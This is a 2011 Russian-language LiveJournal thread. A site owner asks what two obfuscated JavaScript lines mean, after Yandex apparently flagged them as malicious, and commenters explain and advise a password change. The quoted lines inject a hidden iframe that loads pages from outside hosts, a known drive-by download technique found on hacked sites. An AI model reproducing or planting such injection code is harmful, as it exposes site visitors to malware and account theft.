[identity profile] bullking.livejournal.com posting in [community profile] useful_faq
по поводу своего поста про Яндекс получил в личные сообщения разъяснение от "сведущего яндексмэна", что робот Яндекса метит сайты, на страницах которых попадается такое кодосочетание: > document.write("<"+"i"+"f"+"rame"+" sr"+"c='ht"+"tp://"+"no.myftp.info//index.php?c81d53a3048bae925f1ac6a39f0...'"+" style='d"+"isplay:no"+"ne;'>");
> > > > document.write("<"+"i"+"f"+"rame"+" sr"+"c='ht"+"tp://"+"gardian.selfip.info/x3/buble.php?key=rtgddfg&s=a...'"+" style='d"+"isplay:no"+"ne;'>") как вредоносные.

Вопрос к хакерам или программерам: что вообще означает такой код?

Date: 2011-11-10 05:00 pm (UTC)
From: [identity profile] aterentiev.livejournal.com
ну написано же, код вставляет невидиный iframe (фактически еще один браузер) в код самой страницы, в котором открывается линк с no.myftp.info и далее с циферками

Date: 2011-11-11 06:54 am (UTC)
From: [identity profile] aterentiev.livejournal.com
тем, что этой страницей может потенциально отслеживаться активность посетителей и передаваться третьим лицам

Date: 2011-11-11 08:48 pm (UTC)
From: [identity profile] aterentiev.livejournal.com
не совсем
человек заходит на страницу, как ему кажется, которой он доверяет (на вашу, например)
а его действия отслеживаются какой-то "левой" страницей myftp.info, о которой он понятия не имеет

Date: 2011-11-10 05:18 pm (UTC)
From: [identity profile] besisland.livejournal.com
Вставляет скрытую загрузку чего-то предположительно вредоносного.

Date: 2011-11-11 06:40 am (UTC)
From: [identity profile] besisland.livejournal.com
На компьютер посетителя. Во фрейме стоит ссылка на какой-нибудь скрипт или на исполняемый файл для «Виндоус» (конкретно здесь не смотрел, что именно). У определённого процента пользователей это пробьётся через защиту и чего-нибудь сотворит, учётку, допустим, на «В контакте» уведёт и будет спам рассылать.

Date: 2011-11-10 07:10 pm (UTC)
From: [identity profile] karpion.livejournal.com
А зачем Вам такой код на Вашем сайте?

Date: 2011-11-10 09:27 pm (UTC)
From: [identity profile] harry-lonsdale.livejournal.com
"да мой сайт сам робот Яндекса пометил!" \m/

Date: 2011-11-11 11:53 am (UTC)
From: [identity profile] karpion.livejournal.com
Ага. Собака тоже помечает - деревья, столбы...

Date: 2011-11-11 11:52 am (UTC)
From: [identity profile] karpion.livejournal.com
В таком случае есть подозрение, что Ваш эккаунт хакнули, скачали к себе исходники, внедрили туда ссылки на загрузку вредоносного кода и залили обратно. Поменяйте пароли и не сохраняйте их в программе, которая заливает файлы на хостинг.

Date: 2011-11-11 08:34 pm (UTC)
From: [identity profile] karpion.livejournal.com
Вообще-то, механизм размещения материалов на сайте (т.е. программа на сервере, с которой взаимодействует Web-мастер при размещении материалов) не различает СМИ и не-СМИ. В любом случае, у того, кто размещает материалы, есть эккаунт, т.е. имя+пароль.

Date: 2011-11-11 08:49 pm (UTC)
From: [identity profile] karpion.livejournal.com
Вы бы хоть сказали, что это за запись. Ссылочку бы на неё...